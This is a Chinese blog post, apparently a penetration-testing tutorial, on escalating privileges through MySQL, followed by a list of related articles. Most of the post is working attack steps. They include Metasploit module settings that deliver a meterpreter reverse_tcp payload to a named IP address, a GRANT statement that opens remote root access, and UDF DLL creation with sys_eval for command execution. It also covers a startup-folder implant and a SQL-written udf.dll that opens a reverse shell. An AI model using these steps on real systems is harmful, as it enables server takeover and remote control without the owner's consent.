权限提升2(MYSQL)

最新推荐文章于 2024-05-29 14:48:53 发布
最新推荐文章于 2024-05-29 14:48:53 发布
阅读量506 收藏
点赞数
分类专栏: 基础的渗透测试 文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/129558860
版权
数据库账号密码(最高权限)的获取

1、-secure-file-priv没进行目录限制

2、网站存在高权限SQL注入点

3、数据库的存储文件或备份文件

4、网站应用源码中的数据库配置文件

5、采用工具或脚本爆破(需解决外联问题)

Mysql(UDF、MOF、启动项、反弹shell)
1、UDF提权

获取密码-开启外联-高版本创建目录-MSF导出dll-Webshell执行后续

1.mysql<5.2 导出目录c:/windows或system32

2.mysql=>5.2 导出安装目录/lib/plugin/

select version()

select @@basedir

GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;

没有目录采用手工创建plugin目录或利用NTFS流创建

使用MSF中的exploit/multi/mysql/mysql_udf_payload 模块可以进行UDF提权,

MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。

MSF:(前提先开外链)

use exploit/multi/mysql/mysql_udf_payload

set payload windows/meterpreter/reverse_tcp

set password root

set rhosts 47.102.195.100

run

Navicat:

开外联后使用MSF导出,在执行后续命令调用执行

select * from mysql.func where name = "sys_exec"; //查看

create function sys_eval returns string soname "WqkerHcA.dll";//创建函数绑定dll

select sys_eval("whoami");//调用函数进行命令执行

实战开始》》》》》》》》》》》》》》》》》》》

1. 对web网站已经getshell,连接哥斯拉成功

2. 翻阅数据库文件,寻找数据库账号密码

得到数据库账号密码root root123

3. 连接数据库

4. 查看数据库版本select version()

5. 根据数据库版本,mysql=>5.2 需要使用MSF导入目录/lib/plugin/

(1)查看数据库的安装目录

select @@basedir

(2)找到安装目录下的lib,如果没有plugin,需要手动创建文件夹

6. 检查数据库是否开启外链允许

开启外链语句:GRANT ALL PRIVILEGES ON *.* TO '帐号'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;

7. MSF写入eval

使用MSF中的exploit/multi/mysql/mysql_udf_payload 模块可以进行UDF提权,MSF会将dll文件写入lib\plugin\目录下(前提是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。

use exploit/multi/mysql/mysql_udf_payload

set payload windows/meterpreter/reverse_tcp

set password root

set rhosts X.X.X.X

run

8. 查看plugin文件下是否写入dll文件,查询sys_exec函数是否写入

select * from mysql.func where name = "sys_exec"; //查看

create function sys_eval returns string soname "MhlpHMIX.dll";//创建函数绑定dll,此处dll为plugin文件下的文件,文件名要与之对应

select sys_eval("whoami");//调用函数进行命令执行

2、MOF-Win2008后权限控制导致无效-MSF演示

https://www.cnblogs.com/xishaonian/p/6384535.html

MSF:use exploit/windows/mysql/mysql_mof

3、启动项

MSF:(前提先开外链)

use exploit/windows/mysql/mysql_start_up

set rhosts 47.102.195.100

set username root

set password root

set AllowNoCleanup true

set lhost ip(反弹给哪个IP)

set lport 4433

run

C:/programdata/microsoft/windows/start menu/programs/startup/BhzKu.exe

之后进行反弹shell

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0(接受全部IP反弹回的shell)

set lport 4433

run

4、反弹Shell

文章:https://blog.csdn.net/weixin_43801718/article/details/105493042

直接执行下方SQL语句,第二步代码在文章里面

use mysql;

set @a=concat('',

create table Ghost(data LONGBLOB);

insert into Ghost values("");update Ghost set data = @a;

select data from Ghost into DUMPFILE 'C:\\phpstudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll';

create function backshell returns string soname 'udf.dll';

select backshell('IP',7788)

大飞先生
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
详解mysql权限和索引
09-09
MySQL是世界上最流行的开源关系型数据库管理系统之一,其权限管理和索引机制对于数据库的安全性和性能至关重要。本文将深入探讨这两个核心概念。 首先,让我们来看看MySQL权限管理。MySQL权限系统允许管理员...
Mysql提权
IT技术宅-北方的刀郎
03-21 2264
Mysql提权来源:本站转载 作者:佚名 时间:2012-07-19 TAG: 我要投稿Author:小乖&Mix0xrnFrom:http://www.dis9.com & http://team.f4ck.net & http://www.h4x0er.comEmail:hx0c4k@gmail.comData:2012-06-23Weibo:http://t.qq.com/HanWellZh
数据库之Mysql提权
最新发布
白帽黑客鹏哥的博客
05-29 974
UDF(user defined function)⽤户⾃定义函数,是 mysql 的⼀个拓展接⼝。⽤户可以通过⾃定义函数实现在mysql中⽆法⽅便实现的功能,其添加的新函数都可以在 sql 语句中调⽤,就像调⽤本机函数⼀样。 先前条件关于mysql的密码,可以通过假设的网站的配置文件获取,如login.php、config.inc.php等文件获取在默认情况下,mysql只允许本地登录,我们知道可以通过navicat去连接数据库(在知道帐号密码的情况下),但是如果只允许本地登录的情况下,即使知道账号密码的
MYSQL提权
weixin_46626159的博客
03-19 5208
MYSQL udf 提权 一.获取网站权限 1.本地搭建pikachu靶场测试,文件上传漏洞获取webshell (1)简单的前端检测文件类型 (2)直接审查前端源代码,给它删了 (3)上传php后门代码 (4)冰蝎连接后门获取webshell 二.UDF提权 1.UDF提权知识点: (1)读取网站数据库配置文件(了解其命名规则及查找技巧) sql data inc config conn database common include等 (2)读取数据库存储或备.
mysql提权
weixin_33949359的博客
04-08 308
Namp 扫描ip端口 Cms 探测 wpscan kali 工具 Wpscan 扫描出来用户名。用用户名登录ssh 然后利用mysql UDF提权。 1.gcc-g-craptor_udf.c 编译一下下载的c文件 2.gcc-g-shared-Wl,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc 3.登录...
MySQL提权
m0_58606546的博客
11-28 5842
MySQL提权的必要条件: 具有MySQL的root权限,且MySQL以system权限运行。 具有执行SQL语句的权限。 获取root密码的方法: 查看数据库配置文件关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件 安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 3.暴力破解 MySQL数据库提...
mysql给root开启远程访问权限,修改root密码
10-28
但是随着网站流量的增加,后期服务器架构可能会将Web-Server与Mysql-Server分别放在独立的服务器上,以便得到更大性能的提升。在这种情况下,Mysql-Server就需要修改成允许Web-Server进行远程连接。 二、修改Mysql-...
MSSQL/MYSQL运行在低权限帐号下的方法(图文设置教程)
09-11
在IT安全管理中,确保数据库服务器运行在低权限账户下是一项重要的实践,这有助于防止未经授权的权限提升和潜在的安全攻击。本教程将详细讲解如何让MSSQL和MYSQL数据库系统在非System账户下运行,以提高安全性。 ...
角色权限系统
11-06
综上所述,这个“角色权限系统”利用了SSH2框架的灵活性和MySQL的强大数据处理能力,结合EasyUI提供了用户友好的界面,实现了精细的权限控制。对于开发者而言,这样的系统既满足了企业级应用的安全需求,又具备良好...
权限提升Mysql提权-漏洞银行大咖面对面17
07-31
权限提升Mysql提权-漏洞银行大咖面对面17-指剑碎星河大咖
MySQL总结一 UDF提权
xiaopan233的博客
03-25 1942
UDF提权 kali 中文件位置 /usr/share/metasploit-framework/data/exploits/mysql 首先先要破解得到靶机的数据库密码。使用kali连接后。查看一些必要的属性 查看插件路径 show variables like "%plugin%"; 看到了插件目录了。我们来看看我们能通过什么方式将UDF插件放到这个目录...
Mysql数据库提权
weixin_44023460的博客
07-12 1267
Root用户的密码还可能从网页脚本文件中获得,数据库连接直接使用root用户。分别在查询中输入脚本“select shell(‘cmd’,‘net user temp temp123456’)”、“select shell(‘cmd’,'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加“temp”用户,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员权限,执行成功后如图5,图6所示。
MySQL数据库提权
qq_45813384的博客
02-20 276
利用MySql文件导出机制,由于未对文件导出路径进行限制,从而可以利用**secure_file_priv**参数、**日志**、**慢日志**等导出含带恶意代码的PHP文件,获取webshell。
Mysql提权(UDF提权)
一个普普通通的博客
04-17 895
数据库提权较为实用,但只有在root权限才可以提权 mysql提权(udf提权) 借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库 拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php 拿到账号密码直接登录 传udf.dll mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32 如果没有plug
mysql数据库提权
m0_63197559的博客
04-10 625
MySQL数据库提权学习总结
mysql面试题(2023年最新版)
05-09
MySQL权限管理涉及多个核心表,包括user表(全局用户信息)、db表(数据库级别的权限)、table_priv表(数据表操作权限)、columns_priv表(数据列操作权限),以及host表(细化主机上的数据库权限)。这些权限表...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值